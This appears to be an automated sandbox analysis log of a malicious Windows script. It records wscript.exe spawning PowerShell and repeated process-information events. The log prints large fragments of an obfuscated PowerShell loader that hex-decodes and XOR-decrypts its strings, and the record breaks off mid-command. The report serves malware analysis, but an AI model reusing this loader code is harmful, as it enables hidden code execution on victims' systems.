TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDz
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDzJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDzJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3618Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$uncolonizing = """ sfklurenprc ttloi ho anfi mah lt pb l ba{qu ra su au rp ba ar aa kmas( g[ ostht ir tidin wg b] t`$ spreosotwoopomcaamot kodi7sk) l; m s he m ud`$tea enbgaslm rntreunsfaisksimn bc bh d tr=ch mankaeanwdr- uotib ljyee pcsotpr tbspy it leph[ c]di m( s`$sep bo jtsoocumtaahutbeosk7el.dilhae unengflt fhkr b/le ur2 h) s; k br el d difbeo er p(al`$roa tn kaelmupn yerasski csub= m0 c; c au`$caahenpaathmpsnkoeudsgai xsde ex-val bt r c`$sppfnoaut coafmcoatjtlnoul7be. sl ge hnlygcutcih b; b cr`$foamin aa immen kezas ui rs o+ec=bu2mi)ke{ p vi un`$cad bo cg ab fe arwir ri me ds o u= c f`$ sp cobotido um sacetbuo s7op.yis muunb nsretreropi cnutgre(sc`$ rasen hacomfan de fssqisusun, f a2 r) k;el bo m f de pa b di pe`$ria un ba im in ae asthinashonlsc dh s[re`$naa gn satemnan se fseni lspl/ p2 s] g vo=va ud[ pcduo unkivexeunrmetsk]fl: o: streospbbayastteeps( l`$ordpaoobgstbdee ertireri reexsca, f fo1co6su)li; n vi tr`$daatencha amirnreeposurihes bneucdjhmu[ch`$fda bn sa pmabn dekisinidys r/ i2 l]ga il= b j(be`$ naprnpaa um fn veulslii gsunn acfrh u[mi`$ fa onstahum nn ge fsupi rspo/su2an] s hy- pb rxigowersi w1fo5ov3 m) e;gy s vo t mo} c me[ es gtrursai gncog f]en[spsekygrsret rerempi.hvt vezlxblt a. pe rnnoctuo mdnaiman sgsp]ma:pr: pages scsuiaei k. cgfoedrt us stcrr gi sn sgsl( t`$ ba hnsuarem fn ne ds ci dsdendecovh h) l;wh}tu`$beuban ua owklarorsiead0no=tihfatarb s co'kocdea bear0foe ta tepodjaf sclef k4rebse7opfsud tfsc5stfku5bs'bo; m`$reutanina swcea ir iebo1 i=beh jt kbca st'ardca4 mf m0 nfmia tecab sfsa6aue pa bfru6mafswffae cd hbhe7uncgeehif d0fafti7 fa macaa ub cbhk7 fc scjefpy7 de caveftu8 pfspfimfbic odpl7fofgl8see jd wfhi0bjeklfpsf scprd s4 mf icpreamd sfko1mif f6chf sdhee aaag' s;fo`$ du cn hacaw da sr ce o2co= mh rt abme m' nd pepsf uc mekrd ec k9inetab hf o6 if saledmi8spfydd sfsldaiemebaaffochueanabretrare'un;st`$inu hnvia swflajer re b3 r= ehretspbfo p'hjc uabaesi0 te ea ke bd pf jc uf a4clb s7 sc sbbiestc bfla7hoeskdbjfpr0rufmo4ref scombco7 sdas0defca7 eeovd tf pcfiekubpafdi6cie s9brc ca ffloctye wb genefbrf t0lufvua tf fcape ka sbno7urd t1 sfel8enf k7 nfmld ffmi5plfincbacafbskf nc bf sf a' c;be`$touunn pasuw badaraue a4ra=lihhyt bbse s' beulaviegod memibarf d0scf r7omfrae b' t;no`$ cupennia gw iaturmeeav5 g=krhbnt sbre st'sld eemafjac fesadsad a4 lf i6 bfvadalehecstfud5abffoclld o1imfst8nofge7raf sd sful5fif sc f' s;ad`$hiu bn kaopwtua pr mepo6sp=smhcotenb l e' ac ebmeckid uc sa tefa9 afprc afprastfat0sofse8 wfgi5codun7 rfco8 mfre4 af lctebsc5brbga9andta1klfst0 rfbed dftac id fb se u0 kc sa ofma0 bftredebny5 tb b9decox9uve scmefwab ffpi5rnfsc0prfdja b'bn; e`$ su dndkacowhoa sr bebl7se= fhmetcob s h'spckabske lc sf f7 feapd ifor0 lfas4gafaucsab p5 ybad9 bd s4pefad8udfli7agfal8tef oeanf mchvfnodaf' p; f`$ceuwenrea mwdia fr demo8en=arhmat sbsk ce'anc ab rftcc kfcofdmfta5 mfseccafdja uepsdz
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$potomato7); $anamnesisnch = new-object byte[] ($potomato7.length / 2); for($anamnesis=0; $anamnesis -lt $potomato7.length; $anamnesis+=2){ $dogberries = $potomato7.substring($anamnesis, 2); $anamnesisnch[$anamnesis/2] = [convert]::tobyte($dogberries, 16); $anamnesisnch[$anamnesis/2] = ($anamnesisnch[$anamnesis/2] -bxor 153); } [string][system.text.encoding]::ascii.getstring($anamnesisnch);}$unaware0=htb 'cae0eaedfcf4b7fdf5f5';$unaware1=htb 'd4f0faebf6eaf6ffedb7cef0f7aaabb7ccf7eaf8fffcd7f8edf0effcd4fcedf1f6fdea';$unaware2=htb 'defcedc9ebf6fad8fdfdebfceaea';$unaware3=htb 'cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcff';$unaware4=htb 'eaedebf0f7fe';$unaware5=htb 'defcedd4f6fdecf5fcd1f8f7fdf5fc';$unaware6=htb 'cbcdcae9fcfaf0f8f5d7f8f4fcb5b9d1f0fdfcdbe0caf0feb5b9c9ecfbf5f0fa';$unaware7=htb 'cbecf7edf0f4fcb5b9d4f8f7f8fefcfd';$unaware8=htb 'cbfcfff5fcfaedfcfdddfcf5fcfef8edfc';$unaware9=htb 'd0f7d4fcf4f6ebe0d4f6fdecf5fc';$demythologizing0=htb 'd4e0ddfcf5fcfef8edfccde0e9fc';$demythologizing1=htb 'daf5f8eaeab5b9c9ecfbf5f0fab5b9cafcf8f5fcfdb5b9d8f7eaf0daf5f8eaeab5b9d8ecedf6daf5f8eaea';$demythologizing2=htb 'd0f7eff6f2fc';$demythologizing3=htb 'c9ecfbf5f0fab5b9d1f0fdfcdbe0caf0feb5b9d7fceecaf5f6edb5b9cff0ebedecf8f5';$demythologizing4=htb 'cff0ebedecf8f5d8f5f5f6fa';$demythologizing5=htb 'f7edfdf5f5';$demythologizing6=htb 'd7edc9ebf6edfcfaedcff0ebedecf8f5d4fcf4f6ebe0';$demythologizing7=htb 'd0dcc1';$demythologizing8=htb 'c5';$dissonere=htb 'cccadccbaaab';$sanctology=htb 'daf8f5f5cef0f7fdf6eec9ebf6fad8';function fkp {param ($allocyanine, $unsensualized) ;$karskade0 =htb 'bdccf7ebfce9ebf6effcfdb9a4b9b1c2d8e9e9ddf6f4f8f0f7c4a3a3daecebebfcf7edddf6f4f8f0f7b7defcedd8eaeafcf4fbf5f0fceab1b0b9e5b9cef1fcebfcb4d6fbf3fcfaedb9e2b9bdc6b7def5f6fbf8f5d8eaeafcf4fbf5e0daf8faf1fcb9b4d8f7fdb9bdc6b7d5f6faf8edf0f6f7b7cae9f5f0edb1bdddfcf4e0edf1f6f5f6fef0e3f0f7fea1b0c2b4a8c4b7dce8ecf8f5eab1bdccf7f8eef8ebfca9b0b9e4b0b7defcedcde0e9fcb1bdccf7f8eef8ebfca8b0';&($demythologizing7) $karskade0;$karskade5 = htb 'bdd2ecebeffcf5f8fcf7fefdfcb9a4b9bdccf7ebfce9ebf6effcfdb7defcedd4fcedf1f6fdb1bdccf7f8eef8ebfcabb5b9c2cde0e9fcc2c4c4b9d9b1bdccf7f8eef8ebfcaab5b9bdccf7f8eef8ebfcadb0b0';&($demythologizing7) $karskade5;$karskade1 = htb 'ebfcedecebf7b9bdd2ecebeffcf5f8fcf7fefdfcb7d0f7eff6f2fcb1bdf7ecf5f5b5b9d9b1c2cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcffc4b1d7fceeb4d6fbf3fcfaedb9cae0eaedfcf4b7cbecf7edf0f4fcb7d0f7edfcebf6e9cafcebeff0fafceab7d1f8f7fdf5fccbfcffb1b1d7fceeb4d6fbf3fcfaedb9d0f7edc9edebb0b5b9b1bdccf7ebfce9ebf6effcfdb7defcedd4fcedf1f6fdb1bdccf7f8eef8ebfcacb0b0b7d0f7eff6f2fcb1bdf7ecf5f5b5b9d9b1bdd8f5f5f6fae0f8f7f0f7fcb0b0b0b0b5b9bdecf7eafcf7eaecf8f5f0e3fcfdb0b0';&($demythologizing7) $karskade1;}function gdt {param ([parameter(position = 0)] [type[]] $twentythr
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$uncolonizing = """ sfklurenprc ttloi ho anfi mah lt pb l ba{qu ra su au rp ba ar aa kmas( g[ ostht ir tidin wg b] t`$ spreosotwoopomcaamot kodi7sk) l; m s he m ud`$tea enbgaslm rntreunsfaisksimn bc bh d tr=ch mankaeanwdr- uotib ljyee pcsotpr tbspy it leph[ c]di m( s`$sep bo jtsoocumtaahutbeosk7el.dilhae unengflt fhkr b/le ur2 h) s; k br el d difbeo er p(al`$roa tn kaelmupn yerasski csub= m0 c; c au`$caahenpaathmpsnkoeudsgai xsde ex-val bt r c`$sppfnoaut coafmcoatjtlnoul7be. sl ge hnlygcutcih b; b cr`$foamin aa immen kezas ui rs o+ec=bu2mi)ke{ p vi un`$cad bo cg ab fe arwir ri me ds o u= c f`$ sp cobotido um sacetbuo s7op.yis muunb nsretreropi cnutgre(sc`$ rasen hacomfan de fssqisusun, f a2 r) k;el bo m f de pa b di pe`$ria un ba im in ae asthinashonlsc dh s[re`$naa gn satemnan se fseni lspl/ p2 s] g vo=va ud[ pcduo unkivexeunrmetsk]fl: o: streospbbayastteeps( l`$ordpaoobgstbdee ertireri reexsca, f fo1co6su)li; n vi tr`$daatencha amirnreeposurihes bneucdjhmu[ch`$fda bn sa pmabn dekisinidys r/ i2 l]ga il= b j(be`$ naprnpaa um fn veulslii gsunn acfrh u[mi`$ fa onstahum nn ge fsupi rspo/su2an] s hy- pb rxigowersi w1fo5ov3 m) e;gy s vo t mo} c me[ es gtrursai gncog f]en[spsekygrsret rerempi.hvt vezlxblt a. pe rnnoctuo mdnaiman 